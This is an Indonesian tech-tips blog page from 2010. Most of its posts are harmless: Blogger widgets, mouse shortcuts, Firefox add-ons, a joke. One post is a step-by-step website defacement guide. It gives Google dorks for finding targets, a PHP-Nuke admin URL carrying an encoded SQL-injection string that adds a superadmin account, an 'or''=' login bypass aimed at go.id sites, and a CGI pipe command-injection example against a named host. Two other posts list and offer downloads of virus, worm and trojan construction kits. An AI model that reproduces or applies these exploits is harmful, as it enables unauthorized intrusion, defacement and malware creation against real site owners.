Tuesday, January 19, 2010

Cara Membuat Tulisan Terbalik

 Cara membuat tulisan terbalik ? Emangnya bisa?

Bisa dong...
Tulisan yang yang Anda buat bisa terbalik. Ceritanyan waktu smartbekantan lagi browsing-browsing dengan mbah google tentang cara modifikasi facebook, ketemu trick ini...

So, kamu bisa nulis posting blog atau status pada blog kamu dengan tulisan terbalik ini. Atau bisa juga ngerjain temen dengan ngirim email atau pesan lainnya dengan cara ini.

Contoh tulisanya nih...

Tulisan awal :  
SMART BEKANTAN All about Technology | Tips and Trick program, website, software, download.
Terbalik :  
˙pɐoןuʍop 'ǝɹɐʍʇɟos 'ǝʇısqǝʍ 'ɯɐɹƃoɹd ʞɔıɹʇ puɐ sdıʇ | ʎƃoןouɥɔǝʇ ʇnoqɐ ןןɐ uɐʇuɐʞǝq ʇɹɐɯs


Hehe... bingungkan? Saya saja jadi bingung...

Mau tau caranya? Kalau mau tau baca terusannya, kalau nggak mau tau atau udah tau, baca juga... :)


Cara bikin tulisan terbalik :

1.  Buka halaman website berikut : http://www.sevenwires.com/play/UpsideDownLetters.html
2. Tulis kalimat awal pada kolom atas.
3. Nah, tulisan yang muncul pada kolom kedua adalah tulisan yang terbaliknya. Copy dan paste saja ke tempat yang di inginkan







Itu sedikit tips untuk bikin hal yang berbeda..
Silakan komentarnya....( karena saya sangat menghargai pengujung yang memberikan komentarnya)
Read more →

Thursday, January 14, 2010

Cara Pasang Widget Tab View


Kali ini smartbekantan akan kembali memberikan tips dan trik untuk mempercantik blog Anda. Penggunaan menu tabulasi pada blog terkadang memang dibutuhkan dan sering dicari para blogger yang ingin menghemat space pada halaman blognya.

Menu tabulasi atau tab view berfungsi untuk meletakkan link, gambar atau apapaun juga terserah selera. Keuntungannya adalah menghemat space sidebar maupun postingan dengan membaginya memiliki kamar sendiri-sendiri yang akan tampil saat tombol tab di klik

 Cara untuk memasang widget tab view atau menu tabulasi tersebut adalah dengan langkah-langkah berikut:

1. Login pada account blogger Anda.
2. Pilih Layout/tata Letak > Edit HTML
3. Centang pada Expand Template Widget
4. Letakkan kode berikut diantara kode<head> dan </head> 

<script src='http://sites.google.com/site/ariprahmancorp/script/smartbekantan_tab.js' type='text/javascript'/>


5. Selanjutnya letakkan kode berikut di atas kode ]]></b:skin>

/* tab model htt://smartbekantan.blohspot.com */
div.smartbekantan {margin:15px 0 0 0; font: normal 11px arial;}
div.smartbekantan div.smb
{height:28px; overflow: hidden; border:1px solid #ccc; border-bottom:0px;background:#f0f0f0;}
div.smartbekantan div.smb a
{float: left; display: block; text-align: center; text-decoration: none; padding:7px; margin:0; background:#f0f0f0; color: #333; border-right:1px solid #CCCCCC;}
div.smartbekantan div.smb a:hover
{ background:#ccc;}
div.smartbekantan div.smb a.Active
{ background: #333; color:#FFFFFF;}
div.smartbekantan div.Pages
{ clear: both; overflow: hidden; height:150px; padding:0; border:1px solid #ccc; padding:5px;}
div.smartbekantan div.Pages div.Page
{height: 100%;padding: 0px; overflow: hidden; }
div.smartbekantan div.Pages div.Page div.floor
{ font-size:11px; text-align:left;}
#sidebar div.smartbekantan div.Pages div.Page div.floor li {
margin:0; padding:0;}

6. Jika sudah, simpan template.
7. Selanjutnya memasang widget tab view atau menu tabulasi pada elemen halaman Anda. Masuk pada menu Add gadget > HTML/Javascript. Pasang kode berikut pada kontent tersebut :

<form action="smartbekantan.html" method="get">
<div class="smartbekantan" id="smartbekantan">
<div class="smb">
<a>tab1</a>
<a>tab2</a>
<a>tab3</a>
<a>tab4</a>
</div>
<div class="Pages">
<div class="Page"><!-- Tab -->
<div class="floor">
Disini letakkan kode untuk tab 1 anda
</div>
</div><!-- end Tab -->

<div class="Page"><!-- Tab -->
Disini letakkan kode untuk tab 2 anda
</div><!-- end Tab -->

<div class="Page"><!-- Tab -->
<div class="floor">
Disini letakkan kode untuk tab 3 anda
</div>
</div><!-- end Tab -->

<div class="Page"><!-- Tab -->
<div class="floor">
Disini letakkan kode untuk tab 4 anda
</div>
</div><!-- end Tab -->
</div>
</div>
</form>
<script type="text/javascript">smartbekantan_name('smartbekantan');</script>





Selamat mencoba dan silakan berikan pendapat Anda pada kolom komentar..
Read more →

Tuesday, January 12, 2010

Cara Mudah Membuat Kode HTML pada postingan


Sebagai blogger atau webmaster terkadang kita harus menuliskan kode-kode html pada tulisan kita. Agar kita dapat memberikan tutorial atau pembelajaran kepada pengujung blog.

Penulisan kode kadang memakan waktu dan sedikit merepotkan. Namun Anda jangan khawatir, karena ada cara mudah untuk menuliskan kode HTML pada postingan.

Disini smartbekantan akan berbadi sedikit pengetahuan, dan mudah-mudahan bermanfaat.
Untuk memebuat kode tersebut bisa melalui layanan online  melalui situs ini

Caranya sebagai berikut :
1. Masuk ke situs http://centricle.com
2. Setelah halaman terbuka. klik link "tools" pada bagian atas.
3. Pilih link "Encode/decode HTML entities".
4. Maka akan terbuka sebuah kolom isian. Silakan masukkan kode HTML yang akan Anda masukkan ke dalam posting blog atau website.
5. Klik tombol Encode atau Decode.

Hasilnya dapat Anda masukkan ke dalam postingan blog Anda.

Semoga bermanfaat. Jika Anda punya saran dan info, silakan kita sharing di sini.
Read more →

Negara yang lebih maju sejak dulu


Adalah tiga orang ahli dari Jerman. Mereka sedang memaparkan tentang penemuan mereka masing2 untuk mencari tahu negara mana sebenarnya yang dulunya lebih maju. apakah Amerika, Jepang atau Indonesia.

Ahli 1 : Hebat, di Amerika, setelah saya menggali tanah dengan kedalaman 100m, saya menemukan kabel tembaga. Ini mengindikasikan bahwa Amerika sudah menggunakan teknologi telpon sejak beratus-ratus tahun silam.

Ahli 2 : Tunggu dulu, di Jepang, setelah saya menggali sedalam 200m, saya menemukan kabel mirip dengan serat optik. jadi pasti nenek moyang orang jepang sudah jauh lebih maju dari nenek moyang orang Amerika.

Ahli 3 : Itu belum seberapa, di Indonesia, saya sudah menggali sedalam 2 KM dari permukaan tanah namun tetap tidak menemukan apa-apa. Jadi saya yakin nenek moyang orang Indonesia sudah menggunakan teknologi "BLUE TOOTH' sejak dulu.

ahli 1 dan 2 : Hebatt....!!!!
Read more →

Fungsi rahasia dari Tombol Scroll Mouse


Jika anda pengguna komputer, pasti sudah tidak asing lagi dengan yang namanya mouse. Mouse adalah salah satu pendamping setia dari komputer. Hampir semua jenis mouse memiliki 3 buah tombol. Tombol kiri, tombol kanan dan tombol scroll yang ada di tengah. Nah..tombol scroll ini biasanya hanya kita gunakan untuk melakukan scrolling halaman, baik pada saat berinternet maupun mengerjakan sesuatu dengan komputer kita. Padahal ternyata sebenarnya..ada beberapa fungsi penting dan tersembunyi dari tombol scroll mouse yang bisa anda manfaatkan. Berikut ini akan saya tunjukkan beberapa hal yang bisa anda gunakan dengan memanfaatkan tombol scroll mouse yang sering dilupakan orang :

1. Menutup tab browser dengan cepat
saat berinternet dengan membuka tab-tab browser dan ingin menutupnya, biasanya hal yang anda lakukan adalah mengarahkan kursor mouse ke tanda X yang ada di kanan atas untuk menutup tab tersebut. Anda bisa lebih cepat menutup tab browser anda dengan menggunakan scrool mouse. Caranya adalah sebagai berikut :
tekan scroll mouse di tab browser anda di manapun lokasinya..maka browser anda akan tertutup dengan cepat. anda tidak harus mengarahkan mouse dan klik di tanda “X”, cukup klik scroll mouse di bagian manapun tab browser anda. Menghemat waktu bukan :)

2. Membuka tab baru
saat anda browsing dan ingin membuka link di tab baru, maka biasanya anda melakukannya dengan klik kanan link tersebut dan memilih menu “open in new tab” . Anda bisa lebih cepat melakukannya dengan cara klik link tersebut menggunakan scroll mouse. Cukup tekan scroll mouse di link yang anda inginkan, maka link tersebut akan otomatis terbuka di tab baru. Sangat menghemat waktu :)

3. Membuka kumpulan link bookmark sekaligus
Jika anda memiliki situs – situs favorit yang sering anda kunjungi atau ingin anda kunjungi setiap hari, maka biasanya anda melakukan klik di satu per satu link situs tersebut di bookmark anda. Namun ternyata ada cara yang lebih cepat yaitu dengan melakukan klik di folder bookmark dengan scroll mouse. Maka secara otomatis semua link-link situs favorit anda di folder tersebut akan terbuka seluruhnya secara otomatis. Anda tidak perlu lagi membuka satu per satu, karena jika bookmark anda berjumlah banyak akan memakan banyak waktu. Scroll mouse mempercepat semuanya untuk anda :)

4. Scroll otomatis dokumen atau halaman yang sedang anda buka
Jika anda membuka sebuah halaman situs atau sebuah dokumen yang panjang di program – program seperti Word, Excel, Adobe reader, firefox atau explorer, maka untuk melakukan scrolling, biasanya anda lakukan dengan cara memutar scroll mouse dengan jari. Namun jika halaman tersebut panjang sekali..maka hal ini akan membuat jari anda capek :p. Untuk menghindari hal itu, cukup klik dan tahan sebentar tombol scroll mouse anda. Maka anda akan masuk di fitur autoscroll dimana anda bisa menggerakkan dan melakukan scrolling halaman yang sedang anda buka hanya dengan sedikit menggerakkan mouse tanpa harus memutar – mutar tombol scroll. Jari anda tidak akan capek karena membuka sebuah dokumen yang amat sangat panjang :)

sumber http://www.pusatgratis.com

Read more →

Mempercepat Firefox dengan Fasterfox Lite Add-ons



 Sebelumnya saya sudah memberikan cara untuk Percepat Loading Firefox dengan Vacuum Add-ons,  kali ini smartbekantan juga akan memberikan tips yang serupa. Firefox memang sebuah browser yang memiliki nilai lebih ( menurut smartbekantan). Banyak plugin dan add-ons yang dapat dipasang pada firefox ini.

Add-ons berikut dikatakan mampu mempercepat loading Anda hingga lebih dari 3X lipat...cukup menarik bukan? Fasterfox Lite adalah add-ons firefox tersebut.
Silakan Anda download dan install dan perhatikan apa yang akan terjadi pada firefox Anda...


Read more →

Percepat Loading Firefox dengan Vacuum Add-ons



Firefox sebagai salah satu browser andalan tentunya memiliki banyak alasan dari penggunanya. Keamanan firefox diklaim sebagai browser yang bisa mengamankan data dan riwayat surfing kita.
Firefox juga diakui sebagai salah satu browser tercepat.

Jika Anda pengguna browser firefox, berikut ada Add-ons yang bisa makin mempercepat loading saat Anda membuka suatu halaman website. Vacuum, itulah nama add-ons firefox ini.
Add-ons Vacuum memiliki fungsi untuk "membereskan" file database firefox sehingga bisa mengoptimalkan kecepatan firefox saat melakukan loading.
Selain Vacuum, ada juga Add-ons lain untuk Mempercepat Firefox dengan Fasterfox Lite Add-ons



Read more →

Cara dan langkah DEFACE



Apa itu deface?
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down.
Itulah deface.
Nah kalo udah ngerti apa itu defase, sekarang giliran cara melakukan deface....

Berikut cara langkah langkah untuk melakukan deface

Deface situs php nuke
Pake mbah www.google.com
ketik kalimat berikut :

allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php


2. www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)

 
3. Masukkan bug ini di belakang situs tadi :


?op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox



Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.
Tapi jika berhasil, maka di url/browsing akan muncul
www.target.com/nuke/admin.php?op=mod_author


4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi


Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut. 


deface asp dgn sql injection
1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
    misal nya kita dapat target www.situstarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.

deface cgi
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/
web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|


Nih contoh yang berhasil saya deface (.....)

Itulah deface dan kamu sudah jadi defacer dan sudah jadi tersangka serta buronan sebagai defacer....


Pesan saya... HATI-HATI dalam bertindak. Karena deface termasuk perbuatan melanggar hukum.

 
Read more →

Sunday, January 10, 2010

Tools to Create Virus and Malware

Sumber : http://vx.netlux.org/

"INVICTUS" VX Library
$MOOTHiE::s Macro Virus Creator 2000
Access Macro Generator
Acid Flowing Trojan Generator
Advanced Batch Mutator
Advanced Steam Trojan Generator
Alchemic Life Generator
ANSI Bomb Constructor by Duke
The ANSI Bomb Generator
Ansi Bomb Kit
Ansi Bomb Maker
Apokalipses
BAT Poly Generator
Batch Encrypt
Batch Maker
Batch Trojan Generator
Batch Virus Construction Kit
Batch Worm Generator
Batch-O-Matic
Bayros Virus Creation Kit
Bio Hazard Worm Generator
Biological Warefare Virus Creation Kit
BOOM: AnsiBomb Construction Kit
Boot Trojan Generator
Bubble Chamber
Byte Virus Generator
C++ Worm Generator
CcT's Malware Construction Kit
China Town Macro Word Virus Construction Kit
Class Macro Kit
Class.Poppy Construction Kit
CM's Batch Virus Generator
Code Pervertor
CompVCK
CVEX Virus Maker
The Czybik Gen Creation Kit
Dangerous Menu
Dark Slick's Virus Creator
Dav's Delphi Worm Generator
Dav's Media Files Worm Kit
Dav's Virus Builder
Deinonychus Virus Generator
Delphi Batch Virus Kit
Digital Hackers' Alliance Randomized Encryption Generator
The Ding Lik's Millenium C Virus Generator
Dirty Nazi Virus Generator
Duke's Pascal Overwriting Generator
Duke's Pascal Virus Generator
Duke's Simple Virus Cloner Tool
Easy ANSI Bomb Creator
Ejecutor Virus Creator
El-Trucha's Virus Maker
Elektronny Pisatel Virusow
Evil Tool
The Fabulous Jany Batch Vir Gen
Falckon Encrypter
FETIOP
G2 Virus Generator
GenVirus
The German Virus Construction Kit
Gildo Backdoor Generator
Hell P2P Worm Generator
Hutley's mIRC BackdooR Generator
Immortal EAS Virus Creation Centre
The Incredible Batch Bug Maker
Indonesian Virus Source Creator
Indra VBS Worm Construction Kit
Instant Virus Production Kit
Java Script Dav Kit
Javascript Encrypter
JavaScript Generator
JPS Virus Maker
Kagra VBS Worm Generator
Kefi's HLLP Construction Kit
Kefi's HTML Virus Construction Kit
Kefi's P2P Worm Generator
Kids Worm Generator
Kuzja Generator
LAB v1.4 Lädt den X-14 Virus in eine Datei
Laboratorio de virus
LineZer0 Macro Engine
Looper Generator
Lord Of Navan's Invasion Generator
MacrEngine
The Macro Access Kit
Macro Virus Development Kit
Make Your Instant VBS Worm Engine
Mass Destruction Library
Mass O Shit Code Generator
Metric Buttload of Code Generator
Microsoft Macro Virus Generator
Microsoft Visual Basic Script Worm Editor
Mini Ultras Construction Kit
Mister Spock - Virusgenerator Version
MPCGEN Mass Code Generator
MSH Virus Kit
Necronomikons M$ Auto CAD 2002 Virus Maker
Necronomikons Terror Virus Construction Kit
Necronomikons Windoze Worm Factory
Necronomikons Word2K Classvirus Construction Kit
Necronomikons WordXP Macrovirus Generator
NEUROiD Word Macro Virus Generator
Newborn Worm Generator
Next Generation Virus Construktion Kit
Nightmare Joker Word Macro Virus Construction Kit
Nowhere Utilities
NuKE's Randomic Life Generator
Odysseus Macro Virus Construction Kit
Overwritting Virus Construction Toolkit
P0ke's Worm Generator
PetiK Script Worm and Virus Generator
Phalcon/Skism Mass-Produced Code Generator
Powerpoint Macro Generator
Psychologic Script Poly Engine
Psychologic VBS Poly Generator
Purgatory Companion Virus Kit
A Quick & Easy Trojan Developing System
Rajaats Recursive Random Assembler Code Creator
Random Batch Trojan Generator
Random Silly Batch Generator
Razorblade's Batch Virus Generator
Satan's Apocalypse Virus Generator
Satanic Brain Virus Tool's
Senna Spy Internet Worm Generator 2000
Senna Spy One EXE MAker
Senna Spy Trojan Generator
Setman
sevenC BatcH Generator
sevenC Polymorph VBS Generator
The Shinny Batch Trojan Generator
SHVK: Simple HTML Virus Kit
SiCem Virus Creation Labs
Simple and Fast Html Virus Maker
Simple Batch Virus Maker
Simple Chr Encrypter
Simple Script Wormer
Simple Strreverse Encrypter
Simple Win32ASM Overwriter Generator
The Simple WinScript Virus Kit
Skype Worm Generator
The SMEG Virus construction kit
SpaMaCidAL trojan batch file creator
Sucke MiRc Worm Generator
The Super Appending Batch VCK
TAPiON Polymorphic Decryptor Generator
Toxic CV
The Trojan Generator
The Trojan Horse Construction Kit
TSCMK: The Simple Class Macro Kit
TSR Time Bomb Creator
TVBSG Visual Basic Script worm generator
TVBVK: The Visual Basic Virus Kit
Tvorets Chervey
Uber Worm Generator
Ultras Construction Kit for Word
VBS Encryptor
VBS Phirus Constructor
VBS Worm Generator
VCL32
VDX Batch Generator
Viral Matrix
Virus Construction Set
Virus Creation 2000
Virus Creation Lab
Virus Creator 2000
Virus Development Kit
Virus Factory mit Code - Tabelle
A virus generator
Virus Lab Creations
Virus Laboratory for DOS
Virus Researcher's Toolkit
The Virus Wizard
Visual Basic Worm Generator
The WalruS Macro Virus Engine
The WalruS Macro Virus Generator
Wavefunc's Goofy Batch Virus Generator v1.1c
WG Batch n' Script
Windows Scripting Host Worm Constructor
Windows Virus Creation Kit
WMF Maker
Wonesek VBS Joiner
Word97 Macro Virii Construction Kit
Worm IRC Script Kit
WVSG: Word97 VBA SR1 Generator
XVGL
Ye Olde Funky Virus Generator
Zed's Word Macro Virus Constructor


Read more →

Kumpulan Tolls Pembuat Virus, Worm, Trojan



Berikut kumpulan tools untuk membuat virus, worm, trojan.

VBS Worm Generator


Download di sini (……….)

VCL32

Download di sini (………..)

VDX Batch Generator


Download di sini (………..)

Viral Matrix


Download di sini (………..)

Virus Construction Set

Download di sini (……….)

Virus Creation 2000

Download di sini (……….)

Virus Creation Lab

Download di sini (………)

Virus Development Kit

Download di sini (………)

Virus Factory mit Code – Tabelle

Download di sini (………)

A virus generator

Download di sini (………)

Virus Laboratory for DOS


Download di sini (……….)

The Virus Wizard

Download di sini (………)

Visual Basic Worm Generator


Download di sini (………)

The WalruS Macro Virus Engine

Download di sini (………)

Wavefunc’s Goofy Batch Virus Generator v1.1c

Download di sini (………)

WG Batch n’ Script


Download di sini (………)

Windows Scripting Host Worm Constructor

Download di sini (………)

Windows Virus Creation Kit

Download di sini (………)

WMF Maker

Download di sini (………)

Wonesek VBS Joiner

Download di sini (………)

Word97 Macro Virii Construction Kit

Download di sini (………)

Worm IRC Script Kit


Download di sini (………)

XVGL


Download di sini (……….)

$MOOTHiE::s Macro Virus Creator 2000


Download di sini (………)

Access Macro Generator


Download di sini (……….)

Acid Flowing Trojan Generator


Download di sini (……….)

Advanced Steam Trojan Generator


Download di sini (……….)

Alchemic Life Generator


Download di sini (………)

Apokalipses


Download di sini (……….)

BAT Poly Generator


Download di sini (………)

Batch Encrypt


Download di sini (………)

Bio Hazard Worm Generator


Download di sini (………)

C++ Worm Generator


Download di sini (………)

Read more →

Tuesday, January 5, 2010

Dapat dollar Gratis dengan Mudah dan Cepat



People String adalah gelombang terbaru dalam jaringan komunitas sosial global. Di dalamnya ada kreativitas, budaya dan forum untuk mengekspresikan diri, sama seperti Facebook, Myspace, Twitter, dan social network lain. Bedanya, People String membagi-bagikan keuntungannya kepada setiap anggota.

Kongkritnya inilah manfaat tak terhingga dari People String:
1. $1.60 langsung setelah selesai registrasi.
2. $0.50 untuk setiap teman yang Anda ajak bergabung.
Read more →

Sunday, January 3, 2010

Ubah Background Folder dengan IESHWIZBackgroundmaker


Anda mungkin tidak asing lagi dan sudah sering melihat sebuah folder dengan latar brlakang sebuah gambar. Dengan adanya gambar tersebut, kita dapat menyesuaikan dengan selera masing-masing. Disamping itu salah satu keuntungannya adalah untuk lebih mengenal dan mengingat folder berdasarkan isinya..


Download IESHWIZBackgroundmaker

Read more →

Download PCMAV 2.2b + Build 2


Anda tentunya sudah tidak asing lagi dengan Anti virus yang satu ini. Antivirus buatan anak negeri yang cukup handal dalam menangani virus yang menginfeksi komputer Anda.

Berikut saya berikan PCMAV 2.2b + Build 2. Tentunya tetap gratis untuk Anda.

Read more →
 
 
Copyright © SMART BEKANTAN
Designs By Bhambank Mbambong Blog